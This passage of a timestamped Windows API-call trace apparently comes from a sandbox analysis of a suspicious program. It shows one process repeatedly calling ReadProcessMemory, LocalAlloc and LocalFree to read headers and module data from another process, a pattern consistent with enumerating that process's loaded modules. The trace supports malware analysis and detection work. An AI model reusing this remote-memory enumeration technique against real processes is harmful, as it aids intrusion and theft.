uBytes=0x18) returned 0x4bc150 [0038.125] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefc7900e0, lpBuffer=0x4bc150, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bc150*, lpNumberOfBytesRead=0x0) returned 1 [0038.125] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.126] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.126] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x4bad20 [0038.126] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefc7900e0, lpBuffer=0x4bad20, nSize=0x108, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bad20*, lpNumberOfBytesRead=0x0) returned 1 [0038.126] LocalFree (hMem=0x4bc150) returned 0x0 [0038.126] LocalFree (hMem=0x4bad20) returned 0x0 [0038.126] LocalFree (hMem=0x4b8320) returned 0x0 [0038.126] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x11af40, lpBuffer=0x31fa60, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31fa60*, lpNumberOfBytesRead=0x0) returned 1 [0038.126] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.126] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.126] LocalAlloc (uFlags=0x40, uBytes=0x16) returned 0x4bc150 [0038.126] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x119978, lpBuffer=0x4bc150, nSize=0x16, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bc150*, lpNumberOfBytesRead=0x0) returned 1 [0038.126] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefc730000, lpBuffer=0x31f930, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31f930*, lpNumberOfBytesRead=0x0) returned 1 [0038.126] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.126] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.126] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4bc170 [0038.126] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefc7300e8, lpBuffer=0x4bc170, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bc170*, lpNumberOfBytesRead=0x0) returned 1 [0038.127] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.127] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.127] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x4bad20 [0038.127] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefc7300e8, lpBuffer=0x4bad20, nSize=0x108, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bad20*, lpNumberOfBytesRead=0x0) returned 1 [0038.127] LocalFree (hMem=0x4bc170) returned 0x0 [0038.127] LocalFree (hMem=0x4bad20) returned 0x0 [0038.127] LocalFree (hMem=0x4bc150) returned 0x0 [0038.127] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x11b030, lpBuffer=0x31fa60, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31fa60*, lpNumberOfBytesRead=0x0) returned 1 [0038.127] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.127] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.127] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x4b8320 [0038.127] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x1199c8, lpBuffer=0x4b8320, nSize=0x1a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4b8320*, lpNumberOfBytesRead=0x0) returned 1 [0038.127] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefc700000, lpBuffer=0x31f930, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31f930*, lpNumberOfBytesRead=0x0) returned 1 [0038.127] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.127] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.128] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4bc150 [0038.128] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefc7000e0, lpBuffer=0x4bc150, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bc150*, lpNumberOfBytesRead=0x0) returned 1 [0038.128] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.128] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.128] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x4bad20 [0038.128] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefc7000e0, lpBuffer=0x4bad20, nSize=0x108, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bad20*, lpNumberOfBytesRead=0x0) returned 1 [0038.128] LocalFree (hMem=0x4bc150) returned 0x0 [0038.128] LocalFree (hMem=0x4bad20) returned 0x0 [0038.128] LocalFree (hMem=0x4b8320) returned 0x0 [0038.128] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x11b120, lpBuffer=0x31fa60, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31fa60*, lpNumberOfBytesRead=0x0) returned 1 [0038.128] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.128] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.128] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x4b8320 [0038.128] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x1406c8, lpBuffer=0x4b8320, nSize=0x1a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4b8320*, lpNumberOfBytesRead=0x0) returned 1 [0038.128] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefc6a0000, lpBuffer=0x31f930, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31f930*, lpNumberOfBytesRead=0x0) returned 1 [0038.129] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.129] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.129] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4bc150 [0038.129] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefc6a00e0, lpBuffer=0x4bc150, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bc150*, lpNumberOfBytesRead=0x0) returned 1 [0038.129] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.129] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.129] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x4bad20 [0038.129] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefc6a00e0, lpBuffer=0x4bad20, nSize=0x108, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bad20*, lpNumberOfBytesRead=0x0) returned 1 [0038.129] LocalFree (hMem=0x4bc150) returned 0x0 [0038.129] LocalFree (hMem=0x4bad20) returned 0x0 [0038.129] LocalFree (hMem=0x4b8320) returned 0x0 [0038.129] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x11b210, lpBuffer=0x31fa60, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31fa60*, lpNumberOfBytesRead=0x0) returned 1 [0038.129] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.129] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.129] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4bc150 [0038.129] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x140678, lpBuffer=0x4bc150, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bc150*, lpNumberOfBytesRead=0x0) returned 1 [0038.130] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefd0f0000, lpBuffer=0x31f930, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31f930*, lpNumberOfBytesRead=0x0) returned 1 [0038.130] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.130] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.130] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4bc170 [0038.130] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefd0f00f0, lpBuffer=0x4bc170, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bc170*, lpNumberOfBytesRead=0x0) returned 1 [0038.130] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.130] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.130] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x4bad20 [0038.130] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefd0f00f0, lpBuffer=0x4bad20, nSize=0x108, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bad20*, lpNumberOfBytesRead=0x0) returned 1 [0038.130] LocalFree (hMem=0x4bc170) returned 0x0 [0038.130] LocalFree (hMem=0x4bad20) returned 0x0 [0038.130] LocalFree (hMem=0x4bc150) returned 0x0 [0038.130] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x11b300, lpBuffer=0x31fa60, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31fa60*, lpNumberOfBytesRead=0x0) returned 1 [0038.130] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.130] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.130] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4bc150 [0038.131] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x146218, lpBuffer=0x4bc150, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bc150*, lpNumberOfBytesRead=0x0) returned 1 [0038.131] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefc660000, lpBuffer=0x31f930, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31f930*, lpNumberOfBytesRead=0x0) returned 1 [0038.131] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.131] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.131] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4bc170 [0038.131] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefc6600e0, lpBuffer=0x4bc170, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bc170*, lpNumberOfBytesRead=0x0) returned 1 [0038.131] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.131] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.131] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x4bad20 [0038.131] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefc6600e0, lpBuffer=0x4bad20, nSize=0x108, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bad20*, lpNumberOfBytesRead=0x0) returned 1 [0038.131] LocalFree (hMem=0x4bc170) returned 0x0 [0038.131] LocalFree (hMem=0x4bad20) returned 0x0 [0038.131] LocalFree (hMem=0x4bc150) returned 0x0 [0038.131] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x11b3f0, lpBuffer=0x31fa60, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31fa60*, lpNumberOfBytesRead=0x0) returned 1 [0038.132] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.132] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.132] LocalAlloc (uFlags=0x40, uBytes=0x16) returned 0x4bc150 [0038.132] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x146358, lpBuffer=0x4bc150, nSize=0x16, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bc150*, lpNumberOfBytesRead=0x0) returned 1 [0038.132] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefc610000, lpBuffer=0x31f930, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31f930*, lpNumberOfBytesRead=0x0) returned 1 [0038.132] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.132] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.132] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4bc170 [0038.132] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefc6100f0, lpBuffer=0x4bc170, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bc170*, lpNumberOfBytesRead=0x0) returned 1 [0038.132] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.132] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.133] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x4bad20 [0038.133] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefc6100f0, lpBuffer=0x4bad20, nSize=0x108, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bad20*, lpNumberOfBytesRead=0x0) returned 1 [0038.133] LocalFree (hMem=0x4bc170) returned 0x0 [0038.133] LocalFree (hMem=0x4bad20) returned 0x0 [0038.133] LocalFree (hMem=0x4bc150) returned 0x0 [0038.133] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x11b4e0, lpBuffer=0x31fa60, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31fa60*, lpNumberOfBytesRead=0x0) returned 1 [0038.133] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.133] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.133] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x4bc150 [0038.133] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x146498, lpBuffer=0x4bc150, nSize=0x14, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bc150*, lpNumberOfBytesRead=0x0) returned 1 [0038.133] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefc5f0000, lpBuffer=0x31f930, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31f930*, lpNumberOfBytesRead=0x0) returned 1 [0038.134] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.134] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.134] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4bc170 [0038.134] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefc5f00e0, lpBuffer=0x4bc170, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bc170*, lpNumberOfBytesRead=0x0) returned 1 [0038.134] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.134] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.134] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x4bad20 [0038.134] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefc5f00e0, lpBuffer=0x4bad20, nSize=0x108, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bad20*, lpNumberOfBytesRead=0x0) returned 1 [0038.135] LocalFree (hMem=0x4bc170) returned 0x0 [0038.135] LocalFree (hMem=0x4bad20) returned 0x0 [0038.135] LocalFree (hMem=0x4bc150) returned 0x0 [0038.135] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x11b5d0, lpBuffer=0x31fa60, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31fa60*, lpNumberOfBytesRead=0x0) returned 1 [0038.135] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.135] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.135] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x4bc150 [0038.135] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x1465d8, lpBuffer=0x4bc150, nSize=0x14, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bc150*, lpNumberOfBytesRead=0x0) returned 1 [0038.135] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefc5a0000, lpBuffer=0x31f930, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31f930*, lpNumberOfBytesRead=0x0) returned 1 [0038.135] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.135] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.135] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4bc170 [0038.135] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefc5a00f0, lpBuffer=0x4bc170, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bc170*, lpNumberOfBytesRead=0x0) returned 1 [0038.136] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.136] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.136] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x4bad20 [0038.136] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefc5a00f0, lpBuffer=0x4bad20, nSize=0x108, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bad20*, lpNumberOfBytesRead=0x0) returned 1 [0038.136] LocalFree (hMem=0x4bc170) returned 0x0 [0038.136] LocalFree (hMem=0x4bad20) returned 0x0 [0038.136] LocalFree (hMem=0x4bc150) returned 0x0 [0038.136] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x11b6c0, lpBuffer=0x31fa60, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31fa60*, lpNumberOfBytesRead=0x0) returned 1 [0038.136] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.136] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.136] LocalAlloc (uFlags=0x40, uBytes=0x2a) returned 0x4b9e20 [0038.136] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x1486c8, lpBuffer=0x4b9e20, nSize=0x2a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4b9e20*, lpNumberOfBytesRead=0x0) returned 1 [0038.136] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefc550000, lpBuffer=0x31f930, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31f930*, lpNumberOfBytesRead=0x0) returned 1 [0038.136] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.137] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.137] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4bc150 [0038.137] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefc5500e8, lpBuffer=0x4bc150, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bc150*, lpNumberOfBytesRead=0x0) returned 1 [0038.137] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.137] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.137] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x4bad20 [0038.137] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefc5500e8, lpBuffer=0x4bad20, nSize=0x108, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bad20*, lpNumberOfBytesRead=0x0) returned 1 [0038.137] LocalFree (hMem=0x4bc150) returned 0x0 [0038.137] LocalFree (hMem=0x4bad20) returned 0x0 [0038.137] LocalFree (hMem=0x4b9e20) returned 0x0 [0038.137] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x11b7b0, lpBuffer=0x31fa60, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31fa60*, lpNumberOfBytesRead=0x0) returned 1 [0038.138] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.138] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.138] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x4b8320 [0038.138] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x118e88, lpBuffer=0x4b8320, nSize=0x20, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4b8320*, lpNumberOfBytesRead=0x0) returned 1 [0038.138] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefd000000, lpBuffer=0x31f930, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31f930*, lpNumberOfBytesRead=0x0) returned 1 [0038.138] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.138] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.138] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4bc150 [0038.138] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefd0000e0, lpBuffer=0x4bc150, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bc150*, lpNumberOfBytesRead=0x0) returned 1 [0038.139] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.139] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.139] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x4bad20 [0038.139] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefd0000e0, lpBuffer=0x4bad20, nSize=0x108, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bad20*, lpNumberOfBytesRead=0x0) returned 1 [0038.139] LocalFree (hMem=0x4bc150) returned 0x0 [0038.139] LocalFree (hMem=0x4bad20) returned 0x0 [0038.139] LocalFree (hMem=0x4b8320) returned 0x0 [0038.139] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x11b8a0, lpBuffer=0x31fa60, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31fa60*, lpNumberOfBytesRead=0x0) returned 1 [0038.139] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.139] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.139] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x4b8320 [0038.139] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x1467b8, lpBuffer=0x4b8320, nSize=0x1c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4b8320*, lpNumberOfBytesRead=0x0) returned 1 [0038.140] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefc530000, lpBuffer=0x31f930, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31f930*, lpNumberOfBytesRead=0x0) returned 1 [0038.140] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.140] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.140] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4bc150 [0038.140] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefc5300f0, lpBuffer=0x4bc150, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bc150*, lpNumberOfBytesRead=0x0) returned 1 [0038.140] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.140] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.140] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x4bad20 [0038.140] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefc5300f0, lpBuffer=0x4bad20, nSize=0x108, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bad20*, lpNumberOfBytesRead=0x0) returned 1 [0038.141] LocalFree (hMem=0x4bc150) returned 0x0 [0038.141] LocalFree (hMem=0x4bad20) returned 0x0 [0038.141] LocalFree (hMem=0x4b8320) returned 0x0 [0038.141] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x11b990, lpBuffer=0x31fa60, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31fa60*, lpNumberOfBytesRead=0x0) returned 1 [0038.141] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.141] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.141] LocalAlloc (uFlags=0x40, uBytes=0x16) returned 0x4bc150 [0038.141] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x146998, lpBuffer=0x4bc150, nSize=0x16, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bc150*, lpNumberOfBytesRead=0x0) returned 1 [0038.141] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.141] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.141] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4bc170 [0038.142] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.142] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.142] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x4bad20 [0038.142] LocalFree (hMem=0x4bc170) returned 0x0 [0038.142] LocalFree (hMem=0x4bad20) returned 0x0 [0038.142] LocalFree (hMem=0x4bc150) returned 0x0 [0038.142] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x176680, lpBuffer=0x31fa60, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31fa60*, lpNumberOfBytesRead=0x0) returned 1 [0038.142] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.142] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.142] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4bc150 [0038.142] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x146a88, lpBuffer=0x4bc150, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bc150*, lpNumberOfBytesRead=0x0) returned 1 [0038.142] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefc510000, lpBuffer=0x31f930, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31f930*, lpNumberOfBytesRead=0x0) returned 1 [0038.142] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.142] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.143] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4bc170 [0038.143] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefc5100e8, lpBuffer=0x4bc170, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bc170*, lpNumberOfBytesRead=0x0) returned 1 [0038.143] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.143] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.143] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x4bad20 [0038.143] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefc5100e8, lpBuffer=0x4bad20, nSize=0x108, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bad20*, lpNumberOfBytesRead=0x0) returned 1 [0038.143] LocalFree (hMem=0x4bc170) returned 0x0 [0038.143] LocalFree (hMem=0x4bad20) returned 0x0 [0038.143] LocalFree (hMem=0x4bc150) returned 0x0 [0038.143] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x176770, lpBuffer=0x31fa60, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31fa60*, lpNumberOfBytesRead=0x0) returned 1 [0038.143] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.144] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.144] LocalAlloc (uFlags=0x40, uBytes=0x16) returned 0x4bc150 [0038.144] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x173f98, lpBuffer=0x4bc150, nSize=0x16, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bc150*, lpNumberOfBytesRead=0x0) returned 1 [0038.144] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefcfc0000, lpBuffer=0x31f930, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31f930*, 